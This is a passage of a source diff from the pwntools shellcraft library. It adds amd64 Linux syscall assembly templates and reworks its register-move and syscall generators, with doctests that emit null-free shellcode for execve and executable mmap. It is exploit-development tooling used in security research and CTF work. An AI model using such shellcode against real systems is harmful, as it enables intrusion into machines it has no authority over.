+Invokes the syscall symlinkat. See 'man 2 symlinkat' for more information. + +Arguments: + from(char): from + tofd(int): tofd + to(char): to + + + ${syscall('SYS_symlinkat', from, tofd, to)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sync.asm b/pwnlib/shellcraft/templates/amd64/linux/sync.asm new file mode 100644 index 000000000..67767e12b --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sync. See 'man 2 sync' for more information. + +Arguments: + + + + ${syscall('SYS_sync')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sync_file_range.asm b/pwnlib/shellcraft/templates/amd64/linux/sync_file_range.asm new file mode 100644 index 000000000..3f151f1dc --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sync_file_range.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, offset, count, flags"/> +<%docstring> +Invokes the syscall sync_file_range. See 'man 2 sync_file_range' for more information. + +Arguments: + fd(int): fd + offset(off64_t): offset + count(off64_t): count + flags(unsigned): flags + + + ${syscall('SYS_sync_file_range', fd, offset, count, flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/syscall.asm b/pwnlib/shellcraft/templates/amd64/linux/syscall.asm index ad58a4d6a..d6107e42f 100644 --- a/pwnlib/shellcraft/templates/amd64/linux/syscall.asm +++ b/pwnlib/shellcraft/templates/amd64/linux/syscall.asm @@ -1,6 +1,7 @@ <% from pwnlib.shellcraft import amd64 - from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context + from pwnlib.constants import Constant + from pwnlib.abi import linux_amd64_syscall as abi %> <%page args="syscall = None, arg0 = None, arg1 = None, arg2 = None, arg3 = None, arg4 = None, arg5 = None"/> <%docstring> @@ -13,41 +14,39 @@ Example: >>> print pwnlib.shellcraft.amd64.linux.syscall('SYS_execve', 1, 'rsp', 2, 0).rstrip() /* call execve(1, 'rsp', 2, 0) */ - push 0x1 + xor r10d, r10d /* 0 */ + push (SYS_execve) /* 0x3b */ + pop rax + push 1 pop rdi - mov rsi, rsp - push 0x2 + push 2 pop rdx - xor r10d, r10d - push 0x3b - pop rax + mov rsi, rsp syscall >>> print pwnlib.shellcraft.amd64.linux.syscall('SYS_execve', 2, 1, 0, -1).rstrip() /* call execve(2, 1, 0, -1) */ - push 0x2 - pop rdi - push 0x1 - pop rsi push -1 pop r10 - push 0x3b + push (SYS_execve) /* 0x3b */ pop rax - cdq /* Set rdx to 0, rax is known to be positive */ + push 2 + pop rdi + push 1 + pop rsi + cdq /* rdx=0 */ syscall >>> print pwnlib.shellcraft.amd64.linux.syscall().rstrip() /* call syscall() */ syscall >>> print pwnlib.shellcraft.amd64.linux.syscall('rax', 'rdi', 'rsi').rstrip() /* call syscall('rax', 'rdi', 'rsi') */ - /* moving rdi into rdi, but this is a no-op */ - /* moving rsi into rsi, but this is a no-op */ - /* moving rax into rax, but this is a no-op */ + /* setregs noop */ syscall >>> print pwnlib.shellcraft.amd64.linux.syscall('rbp', None, None, 1).rstrip() /* call syscall('rbp', ?, ?, 1) */ - push 0x1 - pop rdx mov rax, rbp + push 1 + pop rdx syscall >>> print pwnlib.shellcraft.amd64.linux.syscall( ... 'SYS_mmap', 0, 0x1000, @@ -55,25 +54,25 @@ Example: ... 'MAP_PRIVATE | MAP_ANONYMOUS', ... -1, 0).rstrip() /* call mmap(0, 4096, 'PROT_READ | PROT_WRITE | PROT_EXEC', 'MAP_PRIVATE | MAP_ANONYMOUS', -1, 0) */ - xor edi, edi - mov esi, 0x1010101 - xor esi, 0x1011101 - push 0x7 - pop rdx - push 0x22 + push (MAP_PRIVATE | MAP_ANONYMOUS) /* 0x22 */ pop r10 push -1 pop r8 - xor r9d, r9d - push 0x9 + xor r9d, r9d /* 0 */ + push (SYS_mmap) /* 9 */ pop rax + xor edi, edi /* 0 */ + push (PROT_READ | PROT_WRITE | PROT_EXEC) /* 7 */ + pop rdx + mov esi, 0x1010101 /* 4096 == 0x1000 */ + xor esi, 0x1011101 syscall <% append_cdq = False - if isinstance(syscall, (str, unicode)) and syscall.startswith('SYS_'): - syscall_repr = syscall[4:] + "(%s)" + if isinstance(syscall, (str, unicode, Constant)) and str(syscall).startswith('SYS_'): + syscall_repr = str(syscall)[4:] + "(%s)" args = [] else: syscall_repr = 'syscall(%s)' @@ -90,16 +89,13 @@ Example: while args and args[-1] == '?': args.pop() syscall_repr = syscall_repr % ', '.join(args) + + registers = abi.register_arguments + arguments = [syscall, arg0, arg1, arg2, arg3, arg4, arg5] + regctx = dict(zip(registers, arguments)) %>\ /* call ${syscall_repr} */ -% for dst, src in zip(['rdi', 'rsi', 'rdx', 'r10', 'r8', 'r9', 'rax'], [arg0, arg1, arg2, arg3, arg4, arg5, syscall]): - % if dst == 'rdx' and src == 0: - <% append_cdq = True %>\ - % elif src != None: - ${amd64.linux.mov(dst, src)} - % endif -% endfor -% if append_cdq: - cdq /* Set rdx to 0, rax is known to be positive */ -% endif +%if any(a is not None for a in arguments): + ${amd64.setregs(regctx)} +%endif syscall diff --git a/pwnlib/shellcraft/templates/amd64/linux/syslog.asm b/pwnlib/shellcraft/templates/amd64/linux/syslog.asm new file mode 100644 index 000000000..9ddc09b04 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/syslog.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pri, fmt, vararg"/> +<%docstring> +Invokes the syscall syslog. See 'man 2 syslog' for more information. + +Arguments: + pri(int): pri + fmt(char): fmt + vararg(int): vararg + + + ${syscall('SYS_syslog', pri, fmt, vararg)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/tee.asm b/pwnlib/shellcraft/templates/amd64/linux/tee.asm new file mode 100644 index 000000000..db7dfb72d --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/tee.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fdin, fdout, len, flags"/> +<%docstring> +Invokes the syscall tee. See 'man 2 tee' for more information. + +Arguments: + fdin(int): fdin + fdout(int): fdout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_tee', fdin, fdout, len, flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/time.asm b/pwnlib/shellcraft/templates/amd64/linux/time.asm new file mode 100644 index 000000000..2f0f01d8f --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/time.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="timer"/> +<%docstring> +Invokes the syscall time. See 'man 2 time' for more information. + +Arguments: + timer(time_t): timer + + + ${syscall('SYS_time', timer)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/timer_create.asm b/pwnlib/shellcraft/templates/amd64/linux/timer_create.asm new file mode 100644 index 000000000..df80fb7dc --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/timer_create.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="clock_id, evp, timerid"/> +<%docstring> +Invokes the syscall timer_create. See 'man 2 timer_create' for more information. + +Arguments: + clock_id(clockid_t): clock_id + evp(sigevent): evp + timerid(timer_t): timerid + + + ${syscall('SYS_timer_create', clock_id, evp, timerid)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/timer_delete.asm b/pwnlib/shellcraft/templates/amd64/linux/timer_delete.asm new file mode 100644 index 000000000..3069254d3 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/timer_delete.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_delete. See 'man 2 timer_delete' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_delete', timerid)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/timer_getoverrun.asm b/pwnlib/shellcraft/templates/amd64/linux/timer_getoverrun.asm new file mode 100644 index 000000000..34fd108d1 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/timer_getoverrun.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_getoverrun. See 'man 2 timer_getoverrun' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_getoverrun', timerid)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/timer_gettime.asm b/pwnlib/shellcraft/templates/amd64/linux/timer_gettime.asm new file mode 100644 index 000000000..13f51e584 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/timer_gettime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="timerid, value"/> +<%docstring> +Invokes the syscall timer_gettime. See 'man 2 timer_gettime' for more information. + +Arguments: + timerid(timer_t): timerid + value(itimerspec): value + + + ${syscall('SYS_timer_gettime', timerid, value)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/timer_settime.asm b/pwnlib/shellcraft/templates/amd64/linux/timer_settime.asm new file mode 100644 index 000000000..7f71595b8 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/timer_settime.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="timerid, flags, value, ovalue"/> +<%docstring> +Invokes the syscall timer_settime. See 'man 2 timer_settime' for more information. + +Arguments: + timerid(timer_t): timerid + flags(int): flags + value(itimerspec): value + ovalue(itimerspec): ovalue + + + ${syscall('SYS_timer_settime', timerid, flags, value, ovalue)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/truncate.asm b/pwnlib/shellcraft/templates/amd64/linux/truncate.asm new file mode 100644 index 000000000..f94a9d089 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/truncate.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate. See 'man 2 truncate' for more information. + +Arguments: + file(char): file + length(off_t): length + + + ${syscall('SYS_truncate', file, length)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/truncate64.asm b/pwnlib/shellcraft/templates/amd64/linux/truncate64.asm new file mode 100644 index 000000000..715daecb9 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/truncate64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate64. See 'man 2 truncate64' for more information. + +Arguments: + file(char): file + length(off64_t): length + + + ${syscall('SYS_truncate64', file, length)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/ulimit.asm b/pwnlib/shellcraft/templates/amd64/linux/ulimit.asm new file mode 100644 index 000000000..0772512df --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/ulimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="cmd, vararg"/> +<%docstring> +Invokes the syscall ulimit. See 'man 2 ulimit' for more information. + +Arguments: + cmd(int): cmd + vararg(int): vararg + + + ${syscall('SYS_ulimit', cmd, vararg)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/umask.asm b/pwnlib/shellcraft/templates/amd64/linux/umask.asm new file mode 100644 index 000000000..4c09a0cbd --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/umask.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="mask"/> +<%docstring> +Invokes the syscall umask. See 'man 2 umask' for more information. + +Arguments: + mask(mode_t): mask + + + ${syscall('SYS_umask', mask)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/uname.asm b/pwnlib/shellcraft/templates/amd64/linux/uname.asm new file mode 100644 index 000000000..b7e560ddf --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/uname.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall uname. See 'man 2 uname' for more information. + +Arguments: + name(utsname): name + + + ${syscall('SYS_uname', name)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/unlink.asm b/pwnlib/shellcraft/templates/amd64/linux/unlink.asm new file mode 100644 index 000000000..8e91f8b40 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/unlink.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall unlink. See 'man 2 unlink' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_unlink', name)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/unlinkat.asm b/pwnlib/shellcraft/templates/amd64/linux/unlinkat.asm new file mode 100644 index 000000000..89b124fe9 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/unlinkat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, name, flag"/> +<%docstring> +Invokes the syscall unlinkat. See 'man 2 unlinkat' for more information. + +Arguments: + fd(int): fd + name(char): name + flag(int): flag + + + ${syscall('SYS_unlinkat', fd, name, flag)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/unshare.asm b/pwnlib/shellcraft/templates/amd64/linux/unshare.asm new file mode 100644 index 000000000..6a86cd3a3 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/unshare.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall unshare. See 'man 2 unshare' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_unshare', flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/ustat.asm b/pwnlib/shellcraft/templates/amd64/linux/ustat.asm new file mode 100644 index 000000000..eb65b170c --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/ustat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="dev, ubuf"/> +<%docstring> +Invokes the syscall ustat. See 'man 2 ustat' for more information. + +Arguments: + dev(dev_t): dev + ubuf(ustat): ubuf + + + ${syscall('SYS_ustat', dev, ubuf)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/utime.asm b/pwnlib/shellcraft/templates/amd64/linux/utime.asm new file mode 100644 index 000000000..3a2d54db2 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/utime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="file, file_times"/> +<%docstring> +Invokes the syscall utime. See 'man 2 utime' for more information. + +Arguments: + file(char): file + file_times(utimbuf): file_times + + + ${syscall('SYS_utime', file, file_times)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/utimensat.asm b/pwnlib/shellcraft/templates/amd64/linux/utimensat.asm new file mode 100644 index 000000000..2aa68cbb0 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/utimensat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, path, times, flags"/> +<%docstring> +Invokes the syscall utimensat. See 'man 2 utimensat' for more information. + +Arguments: + fd(int): fd + path(char): path + times(timespec): times + flags(int): flags + + + ${syscall('SYS_utimensat', fd, path, times, flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/utimes.asm b/pwnlib/shellcraft/templates/amd64/linux/utimes.asm new file mode 100644 index 000000000..2a15054d6 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/utimes.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="file, tvp"/> +<%docstring> +Invokes the syscall utimes. See 'man 2 utimes' for more information. + +Arguments: + file(char): file + tvp(timeval): tvp + + + ${syscall('SYS_utimes', file, tvp)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/vfork.asm b/pwnlib/shellcraft/templates/amd64/linux/vfork.asm new file mode 100644 index 000000000..ad8dcca70 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/vfork.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall vfork. See 'man 2 vfork' for more information. + +Arguments: + + + + ${syscall('SYS_vfork')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/vhangup.asm b/pwnlib/shellcraft/templates/amd64/linux/vhangup.asm new file mode 100644 index 000000000..3d63b761a --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/vhangup.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall vhangup. See 'man 2 vhangup' for more information. + +Arguments: + + + + ${syscall('SYS_vhangup')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/vmsplice.asm b/pwnlib/shellcraft/templates/amd64/linux/vmsplice.asm new file mode 100644 index 000000000..622a1c490 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/vmsplice.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fdout, iov, count, flags"/> +<%docstring> +Invokes the syscall vmsplice. See 'man 2 vmsplice' for more information. + +Arguments: + fdout(int): fdout + iov(iovec): iov + count(size_t): count + flags(unsigned): flags + + + ${syscall('SYS_vmsplice', fdout, iov, count, flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/wait4.asm b/pwnlib/shellcraft/templates/amd64/linux/wait4.asm new file mode 100644 index 000000000..f5c156247 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/wait4.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pid, stat_loc, options, usage"/> +<%docstring> +Invokes the syscall wait4. See 'man 2 wait4' for more information. + +Arguments: + pid(pid_t): pid + stat_loc(WAIT_STATUS): stat_loc + options(int): options + usage(rusage): usage + + + ${syscall('SYS_wait4', pid, stat_loc, options, usage)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/waitid.asm b/pwnlib/shellcraft/templates/amd64/linux/waitid.asm new file mode 100644 index 000000000..6370ca27c --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/waitid.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="idtype, id, infop, options"/> +<%docstring> +Invokes the syscall waitid. See 'man 2 waitid' for more information. + +Arguments: + idtype(idtype_t): idtype + id(id_t): id + infop(siginfo_t): infop + options(int): options + + + ${syscall('SYS_waitid', idtype, id, infop, options)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/waitpid.asm b/pwnlib/shellcraft/templates/amd64/linux/waitpid.asm new file mode 100644 index 000000000..00eaf639e --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/waitpid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pid, stat_loc, options"/> +<%docstring> +Invokes the syscall waitpid. See 'man 2 waitpid' for more information. + +Arguments: + pid(pid_t): pid + stat_loc(int): stat_loc + options(int): options + + + ${syscall('SYS_waitpid', pid, stat_loc, options)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/write.asm b/pwnlib/shellcraft/templates/amd64/linux/write.asm new file mode 100644 index 000000000..26cf86807 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/write.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, buf, n"/> +<%docstring> +Invokes the syscall write. See 'man 2 write' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + + + ${syscall('SYS_write', fd, buf, n)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/writeloop.asm b/pwnlib/shellcraft/templates/amd64/linux/writeloop.asm new file mode 100644 index 000000000..de686af48 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/writeloop.asm @@ -0,0 +1,25 @@ +<% from pwnlib.shellcraft import amd64 %> +<% from pwnlib.shellcraft import common %> +<%page args="readsock=0, writesock=1"/> +<%docstring> +Reads from a buffer of a size and location determined at runtime. +When the shellcode is executing, it should send a pointer and +pointer-width size to determine the location and size of buffer. + +<% +after = common.label("after") +before = common.label("before") +%> + +${before}: + /* Read address / size tuples from fd ${readsock}, and + then write the data to fd ${writesock} */ + ${amd64.linux.readptr(readsock, 'rsi')} + push rsi + ${amd64.linux.readptr(readsock, 'rdx')} + pop rsi + test rdx, rdx + jz ${after} + ${amd64.linux.syscall('SYS_write', writesock, 'rsi', 'rdx')} + jmp ${before} +${after}: \ No newline at end of file diff --git a/pwnlib/shellcraft/templates/amd64/linux/writev.asm b/pwnlib/shellcraft/templates/amd64/linux/writev.asm new file mode 100644 index 000000000..38fb8aff6 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/writev.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, iovec, count"/> +<%docstring> +Invokes the syscall writev. See 'man 2 writev' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + + + ${syscall('SYS_writev', fd, iovec, count)} diff --git a/pwnlib/shellcraft/templates/amd64/memcpy.asm b/pwnlib/shellcraft/templates/amd64/memcpy.asm new file mode 100644 index 000000000..51c9de720 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/memcpy.asm @@ -0,0 +1,13 @@ +<% from pwnlib.shellcraft import amd64, pretty %> +<%docstring>Copies memory. + +Args: + dest: Destination address + src: Source address + n: Number of bytes + +<%page args="dest, src, n"/> + /* memcpy(${pretty(dest)}, ${pretty(src)}, ${pretty(n)}) */ + cld + ${amd64.setregs({'rdi': dest, 'rsi': src, 'rcx': n})} + rep movsb diff --git a/pwnlib/shellcraft/templates/amd64/mov.asm b/pwnlib/shellcraft/templates/amd64/mov.asm index 390110d8b..4c271a400 100644 --- a/pwnlib/shellcraft/templates/amd64/mov.asm +++ b/pwnlib/shellcraft/templates/amd64/mov.asm @@ -1,9 +1,8 @@ <% from pwnlib.util import lists, packing, fiddling, misc - from pwnlib import constants from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context from pwnlib.log import getLogger - from pwnlib.shellcraft import i386 + from pwnlib.shellcraft import eval, pretty, okay from pwnlib.shellcraft.registers import get_register, is_register, bits_required log = getLogger('pwnlib.shellcraft.amd64.mov') %> @@ -27,11 +26,11 @@ Example: >>> print shellcraft.amd64.mov('eax','ebx').rstrip() mov eax, ebx >>> print shellcraft.amd64.mov('eax', 0).rstrip() - xor eax, eax + xor eax, eax /* 0 */ >>> print shellcraft.amd64.mov('ax', 0).rstrip() - xor ax, ax + xor ax, ax /* 0 */ >>> print shellcraft.amd64.mov('rax', 0).rstrip() - xor eax, eax + xor eax, eax /* 0 */ >>> print shellcraft.amd64.mov('rdi', 'ax').rstrip() movzx edi, ax >>> print shellcraft.amd64.mov('al', 'ax').rstrip() @@ -39,36 +38,39 @@ Example: >>> print shellcraft.amd64.mov('ax', 'bl').rstrip() movzx ax, bl >>> print shellcraft.amd64.mov('eax', 1).rstrip() - push 0x1 + push 1 pop rax >>> print shellcraft.amd64.mov('rax', 0xc0).rstrip() xor eax, eax mov al, 0xc0 >>> print shellcraft.amd64.mov('rax', 0xc000).rstrip() xor eax, eax - mov ah, 0xc0 + mov ah, 0xc000 >> 8 >>> print shellcraft.amd64.mov('rax', 0xc0c0).rstrip() xor eax, eax mov ax, 0xc0c0 + >>> print shellcraft.amd64.mov('rdi', 0xff).rstrip() + mov edi, 0x1010101 /* 255 == 0xff */ + xor edi, 0x10101fe >>> print shellcraft.amd64.mov('rax', 0xdead00ff).rstrip() - mov eax, 0x1010101 + mov eax, 0x1010101 /* 3735879935 == 0xdead00ff */ xor eax, 0xdfac01fe >>> print shellcraft.amd64.mov('rax', 0x11dead00ff).rstrip() - mov rax, 0x101010101010101 + mov rax, 0x101010101010101 /* 76750323967 == 0x11dead00ff */ push rax mov rax, 0x1010110dfac01fe xor [rsp], rax pop rax >>> with context.local(os = 'linux'): ... print shellcraft.amd64.mov('eax', 'SYS_read').rstrip() - xor eax, eax + xor eax, eax /* (SYS_read) */ >>> with context.local(os = 'freebsd'): ... print shellcraft.amd64.mov('eax', 'SYS_read').rstrip() - push 0x3 + push (SYS_read) /* 3 */ pop rax >>> with context.local(os = 'linux'): ... print shellcraft.amd64.mov('eax', 'PROT_READ | PROT_WRITE | PROT_EXEC').rstrip() - push 0x7 + push (PROT_READ | PROT_WRITE | PROT_EXEC) /* 7 */ pop rax Args: @@ -77,19 +79,6 @@ Args: stack_allowed (bool): Can the stack be used? <% -def okay(s): - return '\0' not in s and '\n' not in s - -def pretty(n): - if n < 0: - return str(n) - else: - return hex(n) - -src_name = src -if not isinstance(src, (str, tuple)): - src_name = pretty(src) - if not get_register(dest): log.error('%r is not a register' % dest) @@ -113,7 +102,7 @@ if get_register(src): src_size = src.size else: with ctx.local(arch = 'amd64'): - src = constants.eval(src) + src = eval(src) if not dest.fits(src): log.error("cannot mov %s, %r: dest is smaller than src" % (dest, src)) @@ -124,12 +113,11 @@ else: dest = get_register(dest.native32) # Calculate the packed version - srcp = packing.pack(src, dest.size) + srcp = packing.pack(src & ((1<\ % if is_register(src): % if src == dest: @@ -145,7 +133,7 @@ else: ## Special case for zeroes ## XORing the 32-bit register clears the high 32 bits as well % if src == 0: - xor ${dest}, ${dest} + xor ${dest}, ${dest} /* ${src} */ ## Special case for *just* a newline % elif stack_allowed and dest.size in (32,64) and src == 10: push 9 /* mov ${dest}, '\n' */ @@ -157,7 +145,7 @@ else: ## 6aff58 push -1; pop rax ## 48c7c0ffffffff mov rax, -1 % elif stack_allowed and dest.size in (32,64) and (-2**7 <= srcs < 2**7) and okay(srcp[:1]): - push ${pretty(srcs)} + push ${pretty(src)} pop ${dest.native64} ## Easy case, everybody is trivially happy ## This implies that the register size and value are the same. @@ -165,53 +153,53 @@ else: mov ${dest}, ${pretty(src)} ## We can push 32-bit values onto the stack and they are sign-extended. % elif stack_allowed and dest.size in (32,64) and (-2**31 <= srcs < 2**31) and okay(srcp[:4]): - push ${pretty(srcs)} + push ${pretty(src)} pop ${dest.native64} ## We can also leverage the sign-extension to our advantage. ## For example, 0xdeadbeef is sign-extended to 0xffffffffdeadbeef. ## Want EAX=0xdeadbeef, we don't care that RAX=0xfff...deadbeef. % elif stack_allowed and dest.size == 32 and srcu < 2**32 and okay(srcp[:4]): - push ${pretty(srcs)} + push ${pretty(src)} pop ${dest.native64} ## Target value is an 8-bit value, use a 8-bit mov - % elif srcu < 2**8 and okay(srcp[:1]): + % elif srcu < 2**8 and okay(srcp[:1]) and 8 in dest.sizes: xor ${dest.xor}, ${dest.xor} - mov ${dest.sizes[8]}, ${pretty(srcu)} + mov ${dest.sizes[8]}, ${pretty(src)} ## Target value is a 16-bit value with no data in the low 8 bits ## means we can use the 'AH' style register. % elif srcu == srcu & 0xff00 and okay(srcp[1]) and dest.ff00: xor ${dest}, ${dest} - mov ${dest.ff00}, ${pretty(srcu >> 8)} + mov ${dest.ff00}, ${pretty(src)} >> 8 ## Target value is a 16-bit value, use a 16-bit mov % elif srcu < 2**16 and okay(srcp[:2]): xor ${dest.xor}, ${dest.xor} - mov ${dest.sizes[16]}, ${pretty(srcu)} + mov ${dest.sizes[16]}, ${pretty(src)} ## Target value is a 32-bit value, use a 32-bit mov. ## Note that this is zero-extended rather than sign-extended (the 32-bit push above). % elif srcu < 2**32 and okay(srcp[:4]): - mov ${dest.sizes[32]}, ${pretty(srcu)} + mov ${dest.sizes[32]}, ${pretty(src)} ## All else has failed. Use some XOR magic to move things around. % else: <% a,b = fiddling.xor_pair(srcp, avoid = '\x00\n') - a = pretty(packing.unpack(a, dest.size, endian='little', sign=False)) - b = pretty(packing.unpack(b, dest.size, endian='little', sign=False)) + a = '%#x' % packing.unpack(a, dest.size) + b = '%#x' % packing.unpack(b, dest.size) %>\ ## There's no XOR REG, IMM64 but we can take the easy route ## for smaller registers. % if dest.size != 64: - mov ${dest}, ${a} - xor ${dest}, ${b} + mov ${dest}, ${a} /* ${str(src)} == ${"%#x" % (src)} */ + xor ${dest}, ${b} ## However, we can PUSH IMM64 and then perform the XOR that ## way at the top of the stack. % elif stack_allowed: - mov ${dest}, ${a} - push ${dest} - mov ${dest}, ${b} - xor [rsp], ${dest} - pop ${dest} + mov ${dest}, ${a} /* ${str(src)} == ${"%#x" % (src)} */ + push ${dest} + mov ${dest}, ${b} + xor [rsp], ${dest} + pop ${dest} % else: - <% log.error("Cannot put %s into '%s' without using stack." % (pretty(src), dest_orig)) %>\ + <% log.error("Cannot put %s into '%s' without using stack." % (pretty(src), dest_orig)) %>\ % endif % endif % else: diff --git a/pwnlib/shellcraft/templates/amd64/popad.asm b/pwnlib/shellcraft/templates/amd64/popad.asm new file mode 100644 index 000000000..cb4484fd5 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/popad.asm @@ -0,0 +1,13 @@ +<% from pwnlib.shellcraft import amd64 %> +<%docstring> +Pop all of the registers onto the stack which i386 popad does, +in the same order. + + pop rdi + pop rsi + pop rbp + pop rsp + pop rbp + pop rdx + pop rcx + pop rax diff --git a/pwnlib/shellcraft/templates/amd64/push.asm 